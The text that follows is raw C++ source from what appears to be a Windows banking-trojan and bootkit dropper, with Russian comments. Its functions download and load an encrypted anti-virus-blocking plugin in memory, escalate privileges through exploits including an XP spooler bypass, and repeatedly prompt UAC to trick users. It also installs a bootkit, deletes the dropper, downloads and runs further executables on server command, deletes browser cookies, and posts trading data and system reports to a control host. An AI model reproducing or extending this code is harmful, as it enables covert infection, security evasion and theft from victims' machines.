PCHAR GetPathToMsInfo32()
{
int FolderId = CSIDL_SYSTEM;
const char* PathSuffix = "\\";
OSVERSIONINFOEXA ver;
m_memset(&ver, 0, sizeof(ver));
ver.dwOSVersionInfoSize = sizeof(ver);
if (!(BOOL)pGetVersionExA(&ver)) return NULL;
if (ver.dwMajorVersion == 5)
{
FolderId = CSIDL_PROGRAM_FILES;
PathSuffix = "\\Common Files\\Microsoft Shared\\MSInfo\\";
}
PCHAR Path = STR::Alloc(2 * MAX_PATH);
m_memset(Path, 0, STR::Length(Path));
pSHGetSpecialFolderPathA(NULL, Path, FolderId, false);
m_lstrcat(Path, PathSuffix);
m_lstrcat(Path, "msinfo32.exe");
return Path;
}
bool TryToCatchHostLevelInstanceMutex(const char* MutexPrefix)
{
CHAR mutex_name[200];
m_memset(mutex_name, 0, sizeof(mutex_name));
PCHAR machine_id = MakeMachineID();
m_lstrcat(mutex_name, "Global\\");
m_lstrcat(mutex_name, MutexPrefix);
m_lstrcat(mutex_name, machine_id);
STR::Free(machine_id);
LDRDBG("TryToCatchHostLevelInstanceMutex", "Mutex name '%s'.", mutex_name);
SECURITY_ATTRIBUTES sa;
SECURITY_DESCRIPTOR sd;
pInitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION);
pSetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE);
sa.nLength = sizeof (SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = &sd;
sa.bInheritHandle = FALSE;
HANDLE mutex_handle = (HANDLE)pCreateMutexA(&sa, FALSE, mutex_name);
if (mutex_handle == NULL) return false;
// Catch ownership of mutex and never release
DWORD wait_result = (DWORD)pWaitForSingleObject(mutex_handle, 1000);
if (wait_result == WAIT_OBJECT_0) return true;
pCloseHandle(mutex_handle);
return false;
}
int DeleteIECookies(int os, HCAB hCab)
{
char username[256];
DWORD name_len = 256;
if(!(BOOL)pGetUserNameA(&username[0], &name_len)) return 0;
//return 10;
char *Path_cookies = NULL;
switch(os)
{
case 1:
Path_cookies = (char*)MemAlloc(m_lstrlen("C:\\Documents and Settings\\")+name_len+m_lstrlen("\\Cookies"));
m_lstrcpy(Path_cookies,"C:\\Documents and Settings\\");
m_lstrcat(Path_cookies,&username[0]);
m_lstrcat(Path_cookies,"\\Cookies\\");
break;
case 2:
Path_cookies = (char*)MemAlloc(m_lstrlen("C:\\Users\\")+name_len+m_lstrlen("\\AppData\\Roaming\\Microsoft\\Windows\\Cookies"));
m_lstrcpy(Path_cookies,"C:\\Users\\");
m_lstrcat(Path_cookies,&username[0]);
m_lstrcat(Path_cookies,"\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\");
break;
default:
return -1;
}
DeleteFiles(Path_cookies, "*.txt", true, false, hCab);
/*
if(Path_cookies == NULL) return -1;
WIN32_FIND_DATA data;
char *Path_cookies_find = (char*)MemAlloc(m_lstrlen(Path_cookies)+2);
m_lstrcpy(Path_cookies_find,Path_cookies);
m_lstrcat(Path_cookies_find,"\\*");
HANDLE nFindFile = FindFirstFile(Path_cookies_find,&data);
if(nFindFile==NULL) return -1;
do
{
if(m_lstrcmp(data.cFileName,".")==0 || m_lstrcmp(data.cFileName,"..")==0) continue;
char *Path_file = (char*)MemAlloc(m_lstrlen(Path_cookies)+m_lstrlen(data.cFileName)+1);
m_lstrcpy(Path_file,Path_cookies);
m_lstrcat(Path_file,"\\");
m_lstrcat(Path_file,data.cFileName);
if(!DeleteFile(Path_file))
{
DWORD err = pGetLastError();
}
//MemFree(Path_file);
}
while(FindNextFile(nFindFile,&data));
FindClose(nFindFile);
//MemFree(Path_cookies);*/
return 0;
}
BOOL SaveManifest(PCHAR FileName)
{
PCHAR manifest = STR::Alloc(1024);
BOOL ret;
manifest[0] = 0;
for ( int i =0; i< sizeof(Manifest)/sizeof(Manifest[0]); ++i)
{
m_lstrcat(manifest,Manifest[i]);
m_lstrcat(manifest,"\r\n");
};
ret = File::WriteBufferA(FileName,manifest,m_lstrlen(manifest));
STR::Free(manifest);
return ret;
};
DWORD WINAPI AvBlockThread( LPVOID lpData )
{
if ( (DWORD)pGetFileAttributesW( GetStopAVPath() ) != INVALID_FILE_ATTRIBUTES )
{
return 0;
}
char *Host = GetCurrentHost();
if ( Host == NULL )
{
return 0;
}
char AvBlockFile[] = {'/','c','f','g','/','s','t','o','p','a','v','.','p','l','u','g',0};
char AvBlockUrl[256];
m_lstrcpy( AvBlockUrl, Host );
m_lstrcat( AvBlockUrl, AvBlockFile );
LPBYTE BotModule = NULL;
DWORD dwModuleSize = 0;
while ( !DownloadInMem( AvBlockUrl, &BotModule, &dwModuleSize ) )
{
pSleep( 1000 * 60 * 5 );
}
if ( BotModule != NULL && dwModuleSize )
{
LPVOID FileData = MemAlloc( dwModuleSize + 1 );
if ( FileData )
{
m_memcpy( FileData, BotModule, dwModuleSize );
File::WriteBufferW(GetMiniAVPath(), FileData, dwModuleSize );
MemFree( FileData );
}
LPVOID Module = DecryptPlugin( BotModule, dwModuleSize );
if ( Module )
{
HMEMORYMODULE hLib = MemoryLoadLibrary( Module );
if ( hLib == NULL )
{
return 0;
}
MemoryFreeLibrary( hLib );
}
}
return 0;
}
char* CalcNtldrMd5(char* Buffer, DWORD BufferSize)
{
CHAR path[MAX_PATH];
pGetWindowsDirectoryA(path, MAX_PATH);
path[3] = '\0';
m_lstrcat(path, "ntldr");
m_memset(Buffer, 0, BufferSize);
string md5 = MD5StrFromFileA(path);
if (md5.IsEmpty()) return NULL;
if (BufferSize < 33) return NULL;
m_lstrcat(Buffer, md5.t_str());
return Buffer;
}
//
// получаем путь к дроперу для его удаления.
//
VOID GetPaths()
{
BOOL bUsed;
PWCHAR buf = (PWCHAR)MemAlloc(sizeof(WCHAR)*MAX_PATH);
if ( buf )
{
pGetModuleFileNameW(NULL,buf,MAX_PATH-1);
//pOutputDebugStringW(buf);
pWideCharToMultiByte(CP_ACP,0,buf,-1,FileToDelete,sizeof(FileToDelete)-1,NULL,&bUsed);
//pOutputDebugStringA(FileToDelete);
PP_DPRINTF(L"GetPaths: FileToDelete='%S'", FileToDelete);
buf[0]= 0;
pSHGetSpecialFolderPathW(NULL,buf,CSIDL_COMMON_APPDATA ,TRUE);
pWideCharToMultiByte(CP_ACP,0,buf,-1,PathBkFile,sizeof(PathBkFile)-1,NULL,&bUsed);
MemFree(buf);
m_lstrcat(PathBkFile,"\\");
m_lstrcat(PathBkFile,MakeMachineID());
PP_DPRINTF(L"GetPaths: PathBkFile='%S'",PathBkFile);
};
};
PCHAR GetBootkitSignalFileName()
{
PCHAR Path= STR::Alloc(MAX_PATH);
PCHAR UID=STR::Alloc(120);
pGetSystemDirectoryA(Path,MAX_PATH);
GenerateUid(UID);
Path[3]='\0';
PCHAR Pref= STR::GetRightStr(UID,"0");
m_lstrcat(Path, Pref);
STR::Free(Pref);
STR::Free(UID);
return Path;
}
/************************************************************************/
//* Надо ещё сделать парную для MemAlloc очистку памяти в этой процедуре*/
BOOL Delete_IECookies_Norm(BOOL bDeleteCookies, BOOL bDeleteCookiesIndex)
{
DbgMsg("Delete_IECookies_Norm",0,"START");
char szUserProfile[200];
char szFilePath[200];
HANDLE hCacheEnumHandle = NULL;
LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;
DWORD dwSize = 4096; // initial buffer size
// Delete index.dat if requested. Be sure that index.dat is not locked.
if(bDeleteCookiesIndex)
{
// Retrieve from environment user profile path.
pExpandEnvironmentStringsA("%userprofile%", &szUserProfile[0],
sizeof(szUserProfile));
m_memset(&szFilePath[0], 0, sizeof(szFilePath));
//m_memcpy(&szFilePath[0],&szUserProfile[0], m_wcslen(&szUserProfile[0])*sizeof(WCHAR));
//m_memcpy(&szFilePath[m_wcslen(&szUserProfile[0])],L"\\Cookies\\index.dat", 36);
m_lstrcpy(&szFilePath[0], &szUserProfile[0]);
m_lstrcat(&szFilePath[0], "\\Cookies\\index.dat");
// wsprintfW(szFilePath, L"%s%s", szUserProfile, L"\\Cookies\\index.dat");
m_lstrcpy(&szFilePath[0], "C:\\Users\\User\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat");
pDeleteFileA(szFilePath);
DbgMsg("Delete_IECookies_Norm",0,&szFilePath[0]);
DWORD err = pGetLastError();
DbgMsg("Delete_IECookies_Norm",err,"pDeleteFileW");
if(!bDeleteCookies) return TRUE;
}
// Enable initial buffer size for cache entry structure.
//lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwSize];
lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize);
lpCacheEntry->dwStructSize = dwSize;
// URL search pattern (1st parameter) options are: "cookie:", "visited:",
// or NULL ("*.*").
hCacheEnumHandle = pFindFirstUrlCacheEntryA(_T("cookie:") /* in */,
lpCacheEntry /* out */, &dwSize /* in, out */);
// First, obtain handle to internet cache with FindFirstUrlCacheEntry
// for late use with FindNextUrlCacheEntry.
if(hCacheEnumHandle != NULL)
{
pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]);
}
else
{
switch(pGetLastError())
{
case ERROR_INSUFFICIENT_BUFFER:
MemFree(lpCacheEntry);
//lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwSize];
lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize);
lpCacheEntry->dwStructSize = dwSize;
// Repeat first step search with adjusted buffer, exit if not
// found again (in practice one buffer's size adustment is
// always OK).
hCacheEnumHandle = pFindFirstUrlCacheEntryA(NULL, lpCacheEntry, &dwSize);
if(hCacheEnumHandle != NULL)
{
pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]);
break;
}
else
{
// FindFirstUrlCacheEntry fails again, return.
MemFree(lpCacheEntry);
return FALSE;
}
default:
pFindCloseUrlCache(hCacheEnumHandle);
MemFree(lpCacheEntry);
return FALSE;
}
}
// Next, use hCacheEnumHandle obtained from the previous step to delete
// subsequent items of cache.
do
{
// Notice that return values of FindNextUrlCacheEntry (BOOL) and
// FindFirstUrlCacheEntry (HANDLE) are different.
if((BOOL)pFindNextUrlCacheEntryA(hCacheEnumHandle, lpCacheEntry, &dwSize))
{
pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]);
}
else
{
switch(pGetLastError())
{
case ERROR_INSUFFICIENT_BUFFER:
//lpCacheEntry = //(LPINTERNET_CACHE_ENTRY_INFO);
MemFree(lpCacheEntry);
//new char[dwSize];
lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize);
lpCacheEntry->dwStructSize = dwSize;
// Repeat next step search with adjusted buffer, exit if
// error comes up again ((in practice one buffer's size
// adustment is always OK).
if(pFindNextUrlCacheEntryA(hCacheEnumHandle, lpCacheEntry,
&dwSize))
{
pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]);
break;
}
else
{
// FindFirstUrlCacheEntry fails again, return.
pFindCloseUrlCache(hCacheEnumHandle);
MemFree(lpCacheEntry);
return FALSE;
}
break;
case ERROR_NO_MORE_ITEMS:
pFindCloseUrlCache(hCacheEnumHandle);
MemFree(lpCacheEntry);
return TRUE;
default:
pFindCloseUrlCache(hCacheEnumHandle);
MemFree(lpCacheEntry);
return FALSE;
}
}
} while (TRUE);
return FALSE; // never here
}
bool ReportToPlugin( char *Url )
{
WSADATA wsa;
if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
{
return false;
}
char *Host = NULL;
char *Path = NULL;
int Port = 0;
if ( !ParseUrl1( Url, &Host, &Path, &Port ) )
{
return false;
}
char Uid[100];
GenerateUid( Uid );
typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
char *UserAgent = NULL;
UserAgent = (char*)MemAlloc( 1024 );
DWORD dwUserSize = 1024;
pObtainUserAgentString( 0, UserAgent, &dwUserSize );
if ( UserAgent == NULL )
{
MemFree( UserAgent );
UserAgent = "-";
}
char Request[] = "POST %s HTTP/1.0\r\n"
"Host: %s\r\n"
"User-Agent: %s\r\n"
"Accept: text/html\r\n"
"Connection: Close\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: %d\r\n\r\n";
char Args[] = "id=";
char *HttpPacket = NULL;
HttpPacket = (char*)MemAlloc( 2048 );
int iTmp;
if (LoadExe!=NULL)
{
iTmp=m_lstrlen(LoadExe);
}else iTmp=9;
pwsprintfA( HttpPacket, Request, Path, Host, UserAgent, m_lstrlen( Args ) + m_lstrlen( Uid )+iTmp );
m_lstrcat( HttpPacket, Args );
m_lstrcat( HttpPacket, Uid );
if (LoadExe==NULL)
{
LoadExe = (char*)MemAlloc(10);
m_lstrncpy(LoadExe,"&plugins=",9);
LoadExe[9]='\0';
}
m_lstrcat( HttpPacket, LoadExe );
SOCKET Socket = MyConnect1( Host, Port );
if( Socket == -1 )
{
return false;
}
bool b = MySend( Socket, (const char *)HttpPacket, m_lstrlen( HttpPacket ) );
MemFree( HttpPacket );
if ( !b )
{
return false;
}
DWORD dwSize = 0;
char *Buffer = RecvAndParse( Socket, &dwSize );
if ( !Buffer )
{
pclosesocket( Socket );
return false;
}
char MultiDownloadCommand[]={'m','u','l','t','i','d','o','w','n','l','o','a','d',0};
char *Context;
m_strtok_s( Buffer, "\r\n", &Context );
if ( !m_lstrncmp( Buffer, MultiDownloadCommand, m_lstrlen( MultiDownloadCommand ) ) )
{
char * cPointer= m_strstr(&Buffer[1],"http:");
char* cUrl=Buffer;
char* cUrlNext;
int i;
char *DownloadUrl;
while (true)
{
cUrl= m_strstr(&cUrl[1],"http:");
if (cUrl==NULL)break;
cUrlNext= m_strstr(cUrl,"|");
i=m_lstrlen(cUrl)-m_lstrlen(cUrlNext);
DownloadUrl = (char*)MemAlloc(i)+1;
m_lstrncpy(DownloadUrl,cUrl,i);
DownloadUrl[i]='\0';
if ( DownloadUrl )
{
LoadExe=(char*)MemRealloc(LoadExe,33+m_lstrlen(LoadExe)+1);
m_lstrcat( LoadExe, MD5StrFromBuf(DownloadUrl, STRA::Length(DownloadUrl)).t_str());
m_lstrcat( LoadExe, "|");
WCHAR *FileName =(WCHAR *)GetTempName();
if ( FileName && DownloadUrl )
{
ExecuteFile( DownloadUrl, FileName );
}
MemFree( FileName );
}
MemFree( DownloadUrl );
}
}
MemFree( Buffer );
pclosesocket( Socket );
return true;
}
// Ф-ция, которая вызывается при инжекте в другие процессы.
// Проверяет свои права и пробует их расширить для
DWORD WINAPI ExplorerRoutine( LPVOID lpData )
{
//
// Cоздадим отдельный поток для удаления так как дропер может удаляться больше минуты.
//
BOOL bRun = TRUE;
BOOL bRet = FALSE;
BOOL IsUsedExploit = FALSE;
OSVERSIONINFOEXA OSVer = {sizeof(OSVer), 0};
UnhookDlls();
BuildImport((PVOID)GetImageBase());
PP_DPRINTF(L"ExplorerRoutine: started");
if (! IsUserAdmin() )
{
PP_DPRINTF(L"ExplorerRoutine: user is not admin. Trying to take privileges.");
switch ( TakePrivileges() )
{
case 0:
case 2:
bRun = FALSE;
break;
};
PP_DPRINTF(L"ExplorerRoutine: TakePrivile result=%d", bRun);
IsUsedExploit = TRUE; // По идее это всегда TRUE
};
if ( bRun )
{
PP_DPRINTF(L"ExplorerRoutine: run ExplorerMain");
bRet = ExplorerMain();
PP_DPRINTF(L"ExplorerRoutine: ExplorerMain() result=%d", bRet);
}
/* Если есть права Админа но мы не юзали сплоеты и инстал не удался, юзаем сплоеты и снова делаем инстал */
if ( (bRet == FALSE) && (bRun == TRUE) && (IsUsedExploit == FALSE) )
{
PP_DPRINTF(L"ExplorerRoutine: Trying again to take privileges");
IsUsedExploit = TRUE;
switch ( TakePrivileges() )
{
case 0:
case 2:
bRun = FALSE;
break;
};
if ( bRun )
{
PP_DPRINTF(L"ExplorerRoutine: Second call of ExplorerMain");
bRet = ExplorerMain();
PP_DPRINTF(L"ExplorerRoutine: Second ExplorerMain() result=%d", bRet);
}
};
pGetVersionExA(&OSVer);
/* Выкидываем длл на диск и юзаем сплойт спуллера, только XP */
if ( (! bRet) && (PEFile::IsDll((PVOID)GetImageBase()) == FALSE) && (OSVer.dwMajorVersion == 5))
{
PP_DPRINTF(L"ExplorerRoutine: Trying to use XP spooler exploit");
DWORD DropSize = 0;
PVOID DropImage = GetSectionData("DROPER_DLL",&DropSize);
if ( DropImage && DropSize)
{
PCHAR DropFile = File::GetTempNameA();
File::WriteBufferA(DropFile,DropImage,DropSize);
SpoolerBypass(DropFile);
STR::Free(DropFile);
};
};
/* Запуск много раз копии дропера с прошением повышенных прав. */
if ( bRet == FALSE )
{
PP_DPRINTF(L"ExplorerRoutine: start UAC asking cycle");
PCHAR tmpexe,dir,file ;
PCHAR tmp_manifest;
PCHAR NamePrefix = GetSectionAnsiString("DROPER_NAME_PREFIX");
if ( NamePrefix )
do
{
tmpexe = File::GetTempNameA();
tmp_manifest = STR::Alloc(MAX_PATH+1);
dir = (tmpexe != NULL)? File::ExtractFilePath(tmpexe) : NULL ;
file = (tmpexe != NULL)? File::ExtractFileName(tmpexe) : NULL ;
if ( tmp_manifest && dir && file)
{
STR::Free(tmpexe);
tmpexe = STR::New(5,dir,"\\",NamePrefix,file,".exe");
if ( ! tmpexe )
return 0;
m_lstrcpy(tmp_manifest,tmpexe);
m_lstrcat(tmp_manifest,".manifest");
};
if ( tmpexe && tmp_manifest )
if ( pCopyFileA(FileToDelete,tmpexe,FALSE) && SaveManifest(tmp_manifest) )
{
DWORD dwCode = -1;
SHELLEXECUTEINFOA ExecInfo;
m_lstrcpy(tmp_manifest,tmpexe);
m_lstrcat(tmp_manifest," ");
m_lstrcat(tmp_manifest,ARGV_UAC_RUN);
ExecInfo.cbSize = sizeof(ExecInfo);
ExecInfo.lpFile = tmpexe;
ExecInfo.lpParameters = tmp_manifest;
ExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS;
for ( int i = 0; i < 10; ++i )
{
PP_DPRINTF(L"ExplorerRoutine: asking UAC for '%S'", tmp_manifest);
if ( pShellExecuteExA(&ExecInfo) == FALSE )
break;
pWaitForSingleObject(ExecInfo.hProcess,INFINITE);
pGetExitCodeProcess(ExecInfo.hProcess,&dwCode);
if ( dwCode == 0 )
{
PP_DPRINTF(L"ExplorerRoutine: UAC allowed for '%S'", tmp_manifest);
break;
}
}
};
if ( tmpexe )
STR::Free(tmpexe);
if ( tmp_manifest )
STR::Free(tmp_manifest);
if ( dir )
STR::Free(dir);
if ( file )
STR::Free(file);
}
while ( ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES) ); // end do, цикл пока не появится Файл буткита
if ( NamePrefix )
STR::Free(NamePrefix);
};
/* Если инстал был не удачный снова пробуем вдруг повезет*/
if ( bRet == FALSE)
{
PP_DPRINTF(L"ExplorerRoutine: Third call of ExplorerMain");
bRet = ExplorerMain();
PP_DPRINTF(L"ExplorerRoutine: Third ExplorerMain() result=%d", bRet);
}
/* Удаляем дропер */
PP_DPRINTF(L"ExplorerRoutine: Start to delete droper");
pCloseHandle(StartThread(DeleteDropper,NULL));
if ( dwExplorerSelf )
{
PP_DPRINTF(L"ExplorerRoutine: dwExplorerSelf is true. Call ExitProcess()");
pExitProcess(0);
}
return 0;
}
// Ф-ция, которая после проверок вызывает события старта в процессе Explorer,
// что в свою очередь вызывает установку BkDll
BOOL ExplorerMain()
{
BOOL ret = FALSE;
bool BkInstalledSuccess = false;
PP_DPRINTF(L"ExplorerMain: started");
// Вызываем событие старта експлорера
if ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES)
{
PP_DPRINTF(L"ExplorerMain: BkFile not exists. Runing ExplorerStart()");
if ( ExplorerStart(NULL) )
{
ret = TRUE;
BkInstalledSuccess = true;
PP_DPRINTF(L"ExplorerMain: ExplorerStart() finished successfuly. Saving 0x00000001 in '%S'",
PathBkFile);
// Записываем в BkFile 4 байта с единичкой.
File::WriteBufferA(PathBkFile,&ret,sizeof(BOOL));
}
}
else
{
PP_DPRINTF(L"ExplorerMain: BkFile exists.");
ret = TRUE;
};
if ( ret )
{
// Если проверка находит файл Bk или возвращает успех при установке -
// создается файл в системном корне с 4 байтами адреса строки.
// Этот файл проверяется ring3 ботом, который запустил дропер буткита.
// При нахождении этого файла он будет пытатся удалить себя из автозапуска.
PCHAR Path= STR::Alloc(MAX_PATH);
PCHAR UID=STR::Alloc(120);
pGetSystemDirectoryA(Path,MAX_PATH);
GenerateUid(UID);
Path[3]='\0';
PCHAR Pref= STR::GetRightStr(UID,"0");
m_lstrcat(Path, Pref);
PP_DPRINTF(L"ExplorerMain: Bk installed. Creating file '%S'", Path);
File::WriteBufferA(Path,&Path,sizeof(PCHAR));
STR::Free(Pref);
STR::Free(UID);
STR::Free(Path);
};
if (BkInstalledSuccess)
{
DWORD thid = 0;
PP_DPRINTF(L"ExplorerMain: starting reboot thread and reboot notify thread");
pCreateThread(NULL, 0, RebootThread, NULL, 0, &thid);
pCreateThread(NULL, 0, RebootNotifyThread, NULL, 0, &thid);
}
PP_DPRINTF(L"ExplorerMain: finished.");
return ret;
}
void DebugReportCreateConfigReportAndSend()
{
PCHAR MsInfoPath = NULL;
PCHAR MsInfoParam = NULL;
PCHAR ReportPath = NULL;
PCHAR CabPath = NULL;
DebugReportSettings* settings = DebugReportGetSettings();
DBGRPTDBG("DebugReportCreateConfigReportAndSend",
"Started with settings: Enabled='%d' StatPrefix='%s' StatUrl='%s'",
settings->Enabled, settings->StatPrefix, settings->StatUrl
);
if (!settings->Enabled) return;
do
{
// Получаем путь к msinfo32.exe
MsInfoPath = GetPathToMsInfo32();
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "GetPathToMsInfo32() return '%s;", MsInfoPath);
if (MsInfoPath == NULL) break;
// Временный файл для отчета
ReportPath = File::GetTempNameA();
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "GetTempNameA() for report file return '%s;", ReportPath);
if (ReportPath == NULL) break;
MsInfoParam = STR::Alloc(2 * MAX_PATH);
if (MsInfoParam == NULL) break;
PROCESS_INFORMATION pi;
STARTUPINFOA si;
m_memset(&si, 0, sizeof(si));
m_memset(&pi, 0, sizeof(pi));
m_memset(MsInfoParam, 0, STR::Length(MsInfoParam));
// Запускаем скрытно
si.cb = sizeof(si);
si.wShowWindow = SW_HIDE;
m_lstrcat(MsInfoParam, " /report \"");
m_lstrcat(MsInfoParam, ReportPath);
m_lstrcat(MsInfoParam, "\"");
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateProcess('%s', '%s')",
MsInfoPath, MsInfoParam);
BOOL process_result = (BOOL)pCreateProcessA(MsInfoPath, MsInfoParam, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateProcess return %d.(ph=0x%X pid=%d)",
process_result, pi.hProcess, pi.dwProcessId);
if (process_result == FALSE) break;
if (pi.hProcess == NULL) break;
if (pi.hProcess != NULL)
{
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "Waiting for msinfo32.");
pWaitForSingleObject(pi.hProcess, INFINITE);
pCloseHandle(pi.hProcess);
}
if (pi.hThread != NULL) pCloseHandle(pi.hThread);
DWORD attributes = (DWORD)pGetFileAttributesA(ReportPath);
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "'%s' attibutes 0x%X.",
ReportPath, attributes);
if (attributes == INVALID_FILE_ATTRIBUTES) break;
CabPath = File::GetTempNameA();
HCAB CabHandle = CreateCab(CabPath);
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateCab() return 0x%X.",
CabHandle);
if (CabHandle == NULL) break;
AddFileToCab(CabHandle, ReportPath, "sysinfo.txt");
CloseCab(CabHandle);
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "sending sysinfo report.");
string BotUid = GenerateUidAsString(settings->StatPrefix);
DebugReportSendSysInfo(BotUid.t_str(), settings->StatUrl, CabPath);
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "sysinfo report sent.");
}
while (false);
if (ReportPath != NULL) pDeleteFileA(ReportPath);
if (CabPath != NULL) pDeleteFileA(CabPath);
if (ReportPath != NULL) STR::Free(ReportPath);
if (CabPath != NULL) STR::Free(CabPath);
if (MsInfoPath != NULL) STR::Free(MsInfoPath);
DebugReportFreeSettings(settings);
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "finished.");
}
bool SendTradeInfo( char *Buffer )
{
string Serv = GetActiveHost();
if ( Serv.IsEmpty())
return 0;
char Host[30];
m_lstrcpy( Host, Serv.t_str());
char Script[] = {'/','g','e','t','/','t','r','a','.','h','t','m','l',0};
char Args[] = "id=%s&data=%s";
char Request[] = "POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"User-Agent: %s\r\n"
"Accept: text/html\r\n"
"Connection: Close\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: %d\r\n\r\n";
char Uid[100];
GenerateUid( Uid );
char *Data = URLEncode( Buffer );
char *PartReq = (char*)MemAlloc( 1024 );
typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
fwsprintfA _pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
if ( PartReq == NULL )
{
return false;
}
_pwsprintfA( PartReq, Args, Uid, Data );
char *Header = (char*)MemAlloc( 1024 );
if ( Header == NULL )
{
MemFree( PartReq );
return false;
}
char *UserAgent = (char*)MemAlloc( 1024 );
DWORD dwUserSize = 1024;
pObtainUserAgentString( 0, UserAgent, &dwUserSize );
_pwsprintfA( Header, Request, Script, Host, UserAgent, m_lstrlen( PartReq ) );
MemFree( UserAgent );
char *SendBuffer = (char*)MemAlloc( m_lstrlen( PartReq ) + m_lstrlen( Header ) + 1 + 2 );
if ( SendBuffer == NULL )
{
MemFree( PartReq );
MemFree( Header );
return false;
}
m_lstrcpy( SendBuffer, Header );
m_lstrcat( SendBuffer, PartReq );
m_lstrcat( SendBuffer, "\r\n" );
MemFree( Header );
MemFree( PartReq );
SOCKET Socket = MyConnect( Host, 80 );
bool Ret = MySend( Socket, (const char *)SendBuffer, m_lstrlen( SendBuffer ) );
pclosesocket( Socket );
MemFree( SendBuffer );
return Ret;
}
bool AsyncDownload1( char *Url, LPBYTE *lpBuffer, LPDWORD dwSize )
{
WSADATA wsa;
if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
{
return false;
}
char *Host = NULL;
char *Path = NULL;
int Port = 80;
if ( !ParseUrl( Url, &Host, &Path, &Port ) )
{
return false;
}
SOCKET Socket = MyConnect( Host, Port );
if( Socket == -1 )
{
return false;
}
char *UserAgent = NULL;
UserAgent = (char*)MemAlloc( 1024 );
DWORD dwUserSize = 1024;
pObtainUserAgentString( 0, UserAgent, &dwUserSize );
char *query=(char*)MemAlloc(2048);
m_lstrcpy(query,"GET /");
m_lstrcat(query,Path);
m_lstrcat(query," HTTP/1.1\r\nAccept: */* \r\n ");
m_lstrcat(query,"Accept-Language: ru \r\n");
m_lstrcat(query,"UA-CPU: x86 \r\n");
m_lstrcat(query,"Accept-Encoding: gzip, deflate \r\n");
m_lstrcat(query,"User-Agent: ");
m_lstrcat(query,UserAgent);
m_lstrcat(query,"\r\nHost: ");
m_lstrcat(query,Host);
m_lstrcat(query,"\r\nConnection: Close\r\n\r\n\r\n");
bool b = MySend( Socket, (const char *)query, m_lstrlen( query ) );
MemFree( Host );
//MemFree( Path );
MemFree( UserAgent );
MemFree( query );
if ( !b )
{
return false;
}
DWORD dwSizeFile = 0;
char *Buffer = RecvAndParse( Socket, &dwSizeFile );
if ( !Buffer )
{
pclosesocket( Socket );
return false;
}
if ( dwSize )
{
*lpBuffer = (LPBYTE)Buffer;
*dwSize = dwSizeFile;
return true;
}
return false;
}
